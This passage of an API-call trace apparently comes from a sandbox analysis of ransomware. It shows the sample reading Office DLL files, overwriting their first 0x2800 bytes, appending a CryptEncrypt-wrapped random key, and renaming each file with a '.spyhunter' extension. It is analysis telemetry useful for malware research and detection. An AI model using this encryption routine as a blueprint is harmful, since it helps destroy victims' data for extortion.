returned 85 [0145.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.spyhunter")) returned 1 [0145.799] GetProcessHeap () returned 0x2c0000 [0145.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.799] GetProcessHeap () returned 0x2c0000 [0145.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.799] GetProcessHeap () returned 0x2c0000 [0145.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6f68 | out: hHeap=0x2c0000) returned 1 [0145.799] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f120 | out: pbBuffer=0x248f120) returned 1 [0145.799] GetProcessHeap () returned 0x2c0000 [0145.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f118*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f118*=0x30) returned 1 [0145.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.800] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 76 [0145.801] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.801] GetProcessHeap () returned 0x2c0000 [0145.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.801] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f0dc*=0x2800, lpOverlapped=0x0) returned 1 [0145.802] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.802] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f0dc*=0x2800, lpOverlapped=0x0) returned 1 [0145.802] GetProcessHeap () returned 0x2c0000 [0145.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.802] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.802] WriteFile (in: hFile=0xb0, lpBuffer=0x248f11c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x248f11c*, lpNumberOfBytesWritten=0x248f0dc*=0x4, lpOverlapped=0x0) returned 1 [0145.833] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0dc*=0x30, lpOverlapped=0x0) returned 1 [0145.833] CloseHandle (hObject=0xb0) returned 1 [0145.841] GetProcessHeap () returned 0x2c0000 [0145.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.841] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.spyhunter") returned 86 [0145.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.spyhunter")) returned 1 [0145.842] GetProcessHeap () returned 0x2c0000 [0145.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.842] GetProcessHeap () returned 0x2c0000 [0145.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.842] GetProcessHeap () returned 0x2c0000 [0145.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f311d0 | out: hHeap=0x2c0000) returned 1 [0145.842] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f118 | out: pbBuffer=0x248f118) returned 1 [0145.842] GetProcessHeap () returned 0x2c0000 [0145.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f110*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f110*=0x30) returned 1 [0145.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.843] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 75 [0145.843] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0145.843] GetProcessHeap () returned 0x2c0000 [0145.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0145.843] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0145.845] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.845] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0145.845] GetProcessHeap () returned 0x2c0000 [0145.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0145.845] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.845] WriteFile (in: hFile=0xb0, lpBuffer=0x248f114*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x248f114*, lpNumberOfBytesWritten=0x248f0d4*=0x4, lpOverlapped=0x0) returned 1 [0145.897] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0d4*=0x30, lpOverlapped=0x0) returned 1 [0145.897] CloseHandle (hObject=0xb0) returned 1 [0145.897] GetProcessHeap () returned 0x2c0000 [0145.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.897] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.spyhunter") returned 85 [0145.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.spyhunter")) returned 1 [0145.898] GetProcessHeap () returned 0x2c0000 [0145.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.898] GetProcessHeap () returned 0x2c0000 [0145.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.898] GetProcessHeap () returned 0x2c0000 [0145.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6a28 | out: hHeap=0x2c0000) returned 1 [0145.898] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f118 | out: pbBuffer=0x248f118) returned 1 [0145.898] GetProcessHeap () returned 0x2c0000 [0145.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.898] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f110*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f110*=0x30) returned 1 [0145.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.899] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 75 [0145.899] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.899] GetProcessHeap () returned 0x2c0000 [0145.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.899] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0146.109] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.109] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f0d4*=0x2800, lpOverlapped=0x0) returned 1 [0146.109] GetProcessHeap () returned 0x2c0000 [0146.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0146.109] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.109] WriteFile (in: hFile=0xb0, lpBuffer=0x248f114*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x248f114*, lpNumberOfBytesWritten=0x248f0d4*=0x4, lpOverlapped=0x0) returned 1 [0146.110] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0d4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0d4*=0x30, lpOverlapped=0x0) returned 1 [0146.111] CloseHandle (hObject=0xb0) returned 1 [0146.111] GetProcessHeap () returned 0x2c0000 [0146.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.111] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.spyhunter") returned 85 [0146.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.spyhunter")) returned 1 [0146.112] GetProcessHeap () returned 0x2c0000 [0146.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.112] GetProcessHeap () returned 0x2c0000 [0146.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.112] GetProcessHeap () returned 0x2c0000 [0146.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6788 | out: hHeap=0x2c0000) returned 1 [0146.112] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f110 | out: pbBuffer=0x248f110) returned 1 [0146.112] GetProcessHeap () returned 0x2c0000 [0146.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.112] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f108*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f108*=0x30) returned 1 [0146.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.114] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 76 [0146.114] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.114] GetProcessHeap () returned 0x2c0000 [0146.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0146.114] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0146.176] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.176] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0146.177] GetProcessHeap () returned 0x2c0000 [0146.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0146.177] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.177] WriteFile (in: hFile=0xb0, lpBuffer=0x248f10c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x248f10c*, lpNumberOfBytesWritten=0x248f0cc*=0x4, lpOverlapped=0x0) returned 1 [0146.269] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0cc*=0x30, lpOverlapped=0x0) returned 1 [0146.269] CloseHandle (hObject=0xb0) returned 1 [0146.269] GetProcessHeap () returned 0x2c0000 [0146.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.269] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.spyhunter") returned 86 [0146.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.spyhunter")) returned 1 [0146.270] GetProcessHeap () returned 0x2c0000 [0146.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.270] GetProcessHeap () returned 0x2c0000 [0146.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.270] GetProcessHeap () returned 0x2c0000 [0146.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30e30 | out: hHeap=0x2c0000) returned 1 [0146.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f110 | out: pbBuffer=0x248f110) returned 1 [0146.270] GetProcessHeap () returned 0x2c0000 [0146.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f108*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f108*=0x30) returned 1 [0146.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.271] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 76 [0146.271] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.271] GetProcessHeap () returned 0x2c0000 [0146.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.271] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0146.310] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.310] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0146.311] GetProcessHeap () returned 0x2c0000 [0146.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.311] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.311] WriteFile (in: hFile=0xb0, lpBuffer=0x248f10c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x248f10c*, lpNumberOfBytesWritten=0x248f0cc*=0x4, lpOverlapped=0x0) returned 1 [0146.382] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0cc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0cc*=0x30, lpOverlapped=0x0) returned 1 [0146.382] CloseHandle (hObject=0xb0) returned 1 [0146.383] GetProcessHeap () returned 0x2c0000 [0146.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.383] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.spyhunter") returned 86 [0146.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.spyhunter")) returned 1 [0146.383] GetProcessHeap () returned 0x2c0000 [0146.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.383] GetProcessHeap () returned 0x2c0000 [0146.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.384] GetProcessHeap () returned 0x2c0000 [0146.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f307d8 | out: hHeap=0x2c0000) returned 1 [0146.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f108 | out: pbBuffer=0x248f108) returned 1 [0146.384] GetProcessHeap () returned 0x2c0000 [0146.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.384] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f100*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f100*=0x30) returned 1 [0146.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.384] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 74 [0146.384] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.384] GetProcessHeap () returned 0x2c0000 [0146.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.385] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0146.431] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.431] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0146.432] GetProcessHeap () returned 0x2c0000 [0146.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.432] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.432] WriteFile (in: hFile=0xb0, lpBuffer=0x248f104*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x248f104*, lpNumberOfBytesWritten=0x248f0c4*=0x4, lpOverlapped=0x0) returned 1 [0146.433] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0c4*=0x30, lpOverlapped=0x0) returned 1 [0146.433] CloseHandle (hObject=0xb0) returned 1 [0146.433] GetProcessHeap () returned 0x2c0000 [0146.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.433] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.spyhunter") returned 84 [0146.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.spyhunter")) returned 1 [0146.434] GetProcessHeap () returned 0x2c0000 [0146.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.434] GetProcessHeap () returned 0x2c0000 [0146.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.434] GetProcessHeap () returned 0x2c0000 [0146.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 